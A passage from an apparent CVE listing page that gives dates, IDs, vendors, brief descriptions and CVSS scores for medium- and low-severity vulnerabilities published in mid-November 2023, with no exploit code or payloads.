GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

5.4
2023-11-14 CVE-2023-42325 Netgate Cross-site Scripting vulnerability in Netgate Pfsense 2.7.0

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the status_logs_filter_dynamic.php page.

5.4
2023-11-14 CVE-2023-42327 Netgate Cross-site Scripting vulnerability in Netgate Pfsense 2.7.0

Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.

5.4
2023-11-14 CVE-2023-47680 Qodeinteractive Cross-site Scripting vulnerability in Qodeinteractive QI Addons for Elementor

Auth.

5.4
2023-11-13 CVE-2023-6103 Intelbras Cross-site Scripting vulnerability in Intelbras RX 1500 Firmware 1.1.9

A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic.

5.4
2023-11-13 CVE-2023-48068 Dedecms Cross-site Scripting vulnerability in Dedecms 6.2

DedeCMS v6.2 was discovered to contain a Cross-site Scripting (XSS) vulnerability via spec_add.php.

5.4
2023-11-13 CVE-2023-4775 Tinywebgallery Cross-site Scripting vulnerability in Tinywebgallery Advanced Iframe

The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'advanced_iframe' shortcode in versions up to, and including, 2023.8 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-13 CVE-2023-5741 Powr Cross-site Scripting vulnerability in Powr

The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'powr-powr-pack' shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-17 CVE-2023-26364 Adobe Unspecified vulnerability in Adobe Css-Tools

@adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a minor denial of service while attempting to parse CSS.

5.3
2023-11-17 CVE-2023-38324 Opennds Unspecified vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS before 10.1.2.

5.3
2023-11-15 CVE-2023-4723 Webtechstreet Unspecified vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function.

5.3
2023-11-15 CVE-2023-47636 Pimcore Information Exposure Through an Error Message vulnerability in Pimcore Admin Classic Bundle

The Pimcore Admin Classic Bundle provides a Backend UI for Pimcore.

5.3
2023-11-15 CVE-2023-6032 Schneider Electric Path Traversal vulnerability in Schneider-Electric Galaxy VL Firmware and Galaxy VS Firmware

A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could cause a file system enumeration and file download when an attacker navigates to the Network Management Card via HTTPS.

5.3
2023-11-14 CVE-2023-41570 Mikrotik Unspecified vulnerability in Mikrotik Routeros

MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

5.3
2023-11-14 CVE-2023-47126 Typo3 Unspecified vulnerability in Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

5.3
2023-11-14 CVE-2022-23830 AMD Unspecified vulnerability in AMD products

SMM configuration may not be immutable, as intended, when SNP is enabled resulting in a potential limited loss of guest memory integrity.

5.3
2023-11-14 CVE-2023-41366 SAP Exposure of System Data to an Unauthorized Control Sphere vulnerability in SAP Netweaver Application Server Abap

Under certain conditions SAP NetWeaver Application Server ABAP - versions KERNEL 722, KERNEL 7.53, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.54, KERNEL 7.91, KERNEL 7.92, KERNEL 7.93, KERNEL 7.94, KERNEL64UC 7.22, KERNEL64UC 7.22EXT, KERNEL64UC 7.53, KERNEL64NUC 7.22, KERNEL64NUC 7.22EXT, allows an unauthenticated attacker to access the unintended data due to the lack of restrictions applied, which may lead to low impact in confidentiality and no impact on the integrity and availability of the application.

5.3
2023-11-14 CVE-2023-42480 SAP Improper Restriction of Excessive Authentication Attempts vulnerability in SAP Netweaver Application Server Java 7.50

The unauthenticated attacker in NetWeaver AS Java Logon application - version 7.50, can brute force the login functionality to identify the legitimate user ids. This will have an impact on confidentiality but there is no other impact on integrity or availability.

5.3
2023-11-13 CVE-2023-42813 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42814 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42815 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-42816 Nirmata Unspecified vulnerability in Nirmata Kyverno 1.11.0

Kyverno is a policy engine designed for Kubernetes.

5.3
2023-11-13 CVE-2023-6100 Maiwei Safety Production Control Platform Project Unspecified vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability classified as problematic was found in Maiwei Safety Production Control Platform 4.1.

5.3
2023-11-14 CVE-2023-47262 Abbott Unspecified vulnerability in Abbott ID NOW Firmware

The startup process and device configurations of the Abbott ID NOW device, before v7.1, can be interrupted and/or modified via physical access to an internal serial port.

5.2
2023-11-17 CVE-2023-47283 Cubecart Path Traversal vulnerability in Cubecart

Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to obtain files in the system.

4.9
2023-11-15 CVE-2023-6133 Incsub Unrestricted Upload of File with Dangerous Type vulnerability in Incsub Forminator

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient blacklisting on the 'forminator_allowed_mime_types' function in versions up to, and including, 1.27.0.

4.9
2023-11-15 CVE-2023-5984 Schneider Electric Download of Code Without Integrity Check vulnerability in Schneider-Electric Ion8650 Firmware and Ion8800 Firmware

A CWE-494 Download of Code Without Integrity Check vulnerability exists that could allow modified firmware to be uploaded when an authorized admin user begins a firmware update procedure which could result in full control over the device.

4.9
2023-11-14 CVE-2023-46025 Phpgurukul SQL Injection vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

SQL Injection vulnerability in teacher-info.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to obtain sensitive information via the 'editid' parameter.

4.9
2023-11-14 CVE-2021-26345 AMD Out-of-bounds Read vulnerability in AMD products

Failure to validate the value in APCB may allow a privileged attacker to tamper with the APCB token to force an out-of-bounds memory read potentially resulting in a denial of service.

4.9
2023-11-14 CVE-2023-44318 Siemens Use of Hard-coded Cryptographic Key vulnerability in Siemens products

Affected devices use a hardcoded key to obfuscate the configuration backup that an administrator can export from the device.

4.9
2023-11-14 CVE-2023-44319 Siemens Reversible One-Way Hash vulnerability in Siemens products

Affected devices use a weak checksum algorithm to protect the configuration backup that an administrator can export from the device.

4.9
2023-11-13 CVE-2023-31219 Wpchill Server-Side Request Forgery (SSRF) vulnerability in Wpchill Download Monitor

Server-Side Request Forgery (SSRF) vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.1.

4.9
2023-11-13 CVE-2023-37978 Riverside Server-Side Request Forgery (SSRF) vulnerability in Riverside Http Headers

Server-Side Request Forgery (SSRF) vulnerability in Dimitar Ivanov HTTP Headers. This issue affects HTTP Headers: from n/a through 1.18.11.

4.9
2023-11-13 CVE-2023-38515 Church Admin Project Server-Side Request Forgery (SSRF) vulnerability in Church Admin Project Church Admin

Server-Side Request Forgery (SSRF) vulnerability in Andy Moyle Church Admin. This issue affects Church Admin: from n/a through 3.7.56.

4.9
2023-11-16 CVE-2023-46213 Splunk Cross-site Scripting vulnerability in Splunk Cloud and Splunk

In Splunk Enterprise versions below 9.0.7 and 9.1.2, ineffective escaping in the “Show syntax Highlighted” feature can result in the execution of unauthorized code in a user’s web browser.

4.8
2023-11-16 CVE-2023-32957 Dazzlersoft Cross-site Scripting vulnerability in Dazzlersoft Team Members Showcase

Auth.

4.8
2023-11-16 CVE-2023-47245 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Viewer

Auth.

4.8
2023-11-16 CVE-2023-47511 SO WP Cross-site Scripting vulnerability in So-Wp Pinyin Slugs

Auth.

4.8
2023-11-15 CVE-2023-5381 Webtechstreet Cross-site Scripting vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping.

4.8
2023-11-15 CVE-2023-5985 Schneider Electric Cross-site Scripting vulnerability in Schneider-Electric Ion8650 Firmware and Ion8800 Firmware

A CWE-79 Improper Neutralization of Input During Web Page Generation vulnerability exists that could cause compromise of a user’s browser when an attacker with admin privileges has modified system values.

4.8
2023-11-14 CVE-2023-46026 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Teacher Subject Allocation Management System 1.0

Cross Site Scripting (XSS) vulnerability in profile.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary code via the 'adminname' and 'email' parameters.

4.8
2023-11-14 CVE-2023-47528 Sajjad67 Cross-site Scripting vulnerability in Sajjad67 WP Edit Username

Auth.

4.8
2023-11-14 CVE-2023-47533 Wpdevart Cross-site Scripting vulnerability in Wpdevart Countdown and Countup, Woocommerce Sales Timer

Auth.

4.8
2023-11-14 CVE-2023-47546 Walterpinem Cross-site Scripting vulnerability in Walterpinem Oneclick Chat to Order

Auth.

4.8
2023-11-14 CVE-2023-47554 Denk Cross-site Scripting vulnerability in Denk Actueel Financieel Nieuws

Auth.

4.8
2023-11-14 CVE-2023-47646 Cedcommerce Cross-site Scripting vulnerability in Cedcommerce Recently Viewed and Most Viewed products

Auth.

4.8
2023-11-14 CVE-2023-47653 Theweb Designs Cross-site Scripting vulnerability in Theweb-Designs TWB Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-47658 Actpro Cross-site Scripting vulnerability in Actpro Extra Product Options for Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-47660 Wpwham Cross-site Scripting vulnerability in Wpwham Product Visibility BY Country for Woocommerce

Auth.

4.8
2023-11-14 CVE-2023-46099 Siemens Cross-site Scripting vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

4.8
2023-11-14 CVE-2023-31754 Optimizely Cross-site Scripting vulnerability in Optimizely CMS

Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel.

4.8
2023-11-14 CVE-2023-47628 Datahub Project Insufficient Session Expiration vulnerability in Datahub Project Datahub

DataHub is an open-source metadata platform.

4.8
2023-11-14 CVE-2023-47657 Grandplugins Cross-site Scripting vulnerability in Grandplugins WOO Quick View and BUY NOW

Auth.

4.8
2023-11-14 CVE-2023-47662 Goldbroker Cross-site Scripting vulnerability in Goldbroker Live Gold Price & Silver Price Charts Widgets

Auth.

4.8
2023-11-16 CVE-2023-6176 Linux, Redhat NULL Pointer Dereference vulnerability in multiple products

A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality.

4.7
2023-11-14 CVE-2023-22310 Intel Race Condition vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Race condition in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

4.7
2023-11-13 CVE-2023-47801 Clickstudios Incorrect Permission Assignment for Critical Resource vulnerability in Clickstudios Passwordstate 9.5/9.6

An issue was discovered in Click Studios Passwordstate before 9811.

4.7
2023-11-14 CVE-2023-20526 AMD Unspecified vulnerability in AMD products

Insufficient input validation in the ASP Bootloader may enable a privileged attacker with physical access to expose the contents of ASP memory potentially leading to a loss of confidentiality.

4.6
2023-11-14 CVE-2023-24588 Intel Unspecified vulnerability in Intel products

Exposure of sensitive information to an unauthorized actor in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access.

4.6
2023-11-14 CVE-2023-27879 Intel Unspecified vulnerability in Intel products

Improper access control in firmware for some Intel(R) Optane(TM) SSD products may allow an unauthenticated user to potentially enable information disclosure via physical access.

4.6
2023-11-14 CVE-2022-41659 Intel Unspecified vulnerability in Intel Unison

Improper access control for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2022-46298 Intel Incomplete Cleanup vulnerability in Intel Unison Software

Incomplete cleanup for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2022-46301 Intel Improper Initialization vulnerability in Intel Unison Software

Improper Initialization for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-22327 Intel Out-of-bounds Write vulnerability in Intel products

Out-of-bounds write in firmware for some Intel(R) FPGA products before version 2.8.1 may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-14 CVE-2023-24587 Intel Unspecified vulnerability in Intel products

Insufficient control flow management in firmware for some Intel(R) Optane(TM) SSD products may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-39411 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.

4.4
2023-11-14 CVE-2023-40220 Intel Unspecified vulnerability in Intel Nuc6Cayh Firmware and Nuc6Cays Firmware

Improper buffer restrictions in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-14 CVE-2023-40540 Intel Unspecified vulnerability in Intel products

Non-Transparent Sharing of Microarchitectural Resources in some Intel(R) NUC BIOS firmware may allow a privileged user to potentially enable information disclosure via local access.

4.4
2023-11-17 CVE-2023-48294 Librenms Unspecified vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring system which includes support for a wide range of network hardware and operating systems.

4.3
2023-11-17 CVE-2023-44355 Adobe Improper Input Validation vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass.

4.3
2023-11-17 CVE-2020-11447 Bell Unspecified vulnerability in Bell Home HUB 3000 Firmware Sg48222070

An issue was discovered on Bell HomeHub 3000 SG48222070 devices.

4.3
2023-11-16 CVE-2023-48231 VIM, Fedoraproject Use After Free vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48232 VIM, Fedoraproject Improper Handling of Exceptional Conditions vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48233 VIM, Fedoraproject Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48234 VIM, Fedoraproject Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48235 VIM, Fedoraproject Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48236 VIM, Fedoraproject Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-48237 VIM, Fedoraproject Integer Overflow or Wraparound vulnerability in multiple products

Vim is an open source command line text editor.

4.3
2023-11-16 CVE-2023-47112 Pagerduty Missing Authorization vulnerability in Pagerduty Rundeck 4.17.0/4.17.1/4.17.2

Rundeck is an open source automation service with a web console, command line tools and a WebAPI.

4.3
2023-11-16 CVE-2023-47642 Zulip Unspecified vulnerability in Zulip Server

Zulip is an open-source team collaboration tool.

4.3
2023-11-16 CVE-2023-36026 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Spoofing Vulnerability

4.3
2023-11-16 CVE-2023-6121 Redhat Out-of-bounds Read vulnerability in Redhat Enterprise Linux

An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel.

4.3
2023-11-15 CVE-2023-4689 Webtechstreet Cross-Site Request Forgery (CSRF) vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7.

4.3
2023-11-15 CVE-2023-4690 Webtechstreet Cross-Site Request Forgery (CSRF) vulnerability in Webtechstreet Elementor Addon Elements

The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7.

4.3
2023-11-14 CVE-2023-6124 Salesagility Server-Side Request Forgery (SSRF) vulnerability in Salesagility Suitecrm

Server-Side Request Forgery (SSRF) in GitHub repository salesagility/suitecrm prior to 7.14.2, 8.4.2, 7.12.14.

4.3
2023-11-14 CVE-2023-44320 Siemens Forced Browsing vulnerability in Siemens products

Affected devices do not properly validate the authentication when performing certain modifications in the web interface allowing an authenticated attacker to influence the user interface configured by an administrator.

4.3
2023-11-13 CVE-2023-47625 Dronecode Classic Buffer Overflow vulnerability in Dronecode PX4 Drone Autopilot 1.14.0

PX4 autopilot is a flight control solution for drones.

4.3
2023-11-13 CVE-2023-48063 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

An issue was discovered in dreamer_cms 4.1.3.

4.3
2023-11-13 CVE-2023-38363 IBM Unspecified vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 does not set the secure attribute on authorization tokens or session cookies.

4.3
2023-11-14 CVE-2023-36007 Microsoft Unspecified vulnerability in Microsoft Send Customer Voice Survey From Dynamics 365 9.0.0.0/9.0.0.7

Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability

4.1

11 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-15 CVE-2023-30954 Palantir Race Condition vulnerability in Palantir Video-Application-Server

The Gotham video-application-server service contained a race condition which would cause it to not apply certain ACLs to new videos if the source system had not yet initialized.

3.7
2023-11-15 CVE-2023-46121 YT DLP Project HTTP Request Smuggling vulnerability in Yt-Dlp Project Yt-Dlp

yt-dlp is a youtube-dl fork with additional features and fixes.

3.7
2023-11-14 CVE-2023-6109 YOP Poll Race Condition vulnerability in Yop-Poll YOP Poll

The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26.

3.7
2023-11-14 CVE-2023-22329 Intel Unspecified vulnerability in Intel products

Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access.

3.5
2023-11-14 CVE-2023-36016 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

3.4
2023-11-17 CVE-2023-47072 Adobe Access of Uninitialized Pointer vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

3.3
2023-11-16 CVE-2023-47060 Adobe Access of Uninitialized Pointer vulnerability in Adobe Premiere PRO

Adobe Premiere Pro version 24.0 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

3.3
2023-11-14 CVE-2023-20519 AMD Use After Free vulnerability in AMD Genoapi Firmware and Milanpi Firmware

A Use-After-Free vulnerability in the management of an SNP guest context page may allow a malicious hypervisor to masquerade as the guest's migration agent resulting in a potential loss of guest integrity.

3.3
2023-11-14 CVE-2023-45585 Fortinet Information Exposure Through Log Files vulnerability in Fortinet Fortisiem

An insertion of sensitive information into log file vulnerability [CWE-532] in FortiSIEM version 7.0.0, version 6.7.6 and below, version 6.6.3 and below, version 6.5.1 and below, version 6.4.2 and below, version 6.3.3 and below, version 6.2.1 and below, version 6.1.2 and below, version 5.4.0, version 5.3.3 and below may allow an authenticated user to view an encrypted ElasticSearch password via debug log files generated when FortiSIEM is configured with ElasticSearch Event Storage.

3.3
2023-11-15 CVE-2023-23549 Tribe29 Unspecified vulnerability in Tribe29 Checkmk 2.0.0/2.1.0/2.2.0

Improper Input Validation in Checkmk <2.2.0p15, <2.1.0p37, <=2.0.0p39 allows privileged attackers to cause partial denial of service of the UI via too long hostnames.

2.7
2023-11-14 CVE-2023-22313 Intel Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Intel products

Improper buffer restrictions in some Intel(R) QAT Library software before version 22.07.1 may allow a privileged user to potentially enable information disclosure via local access.

2.3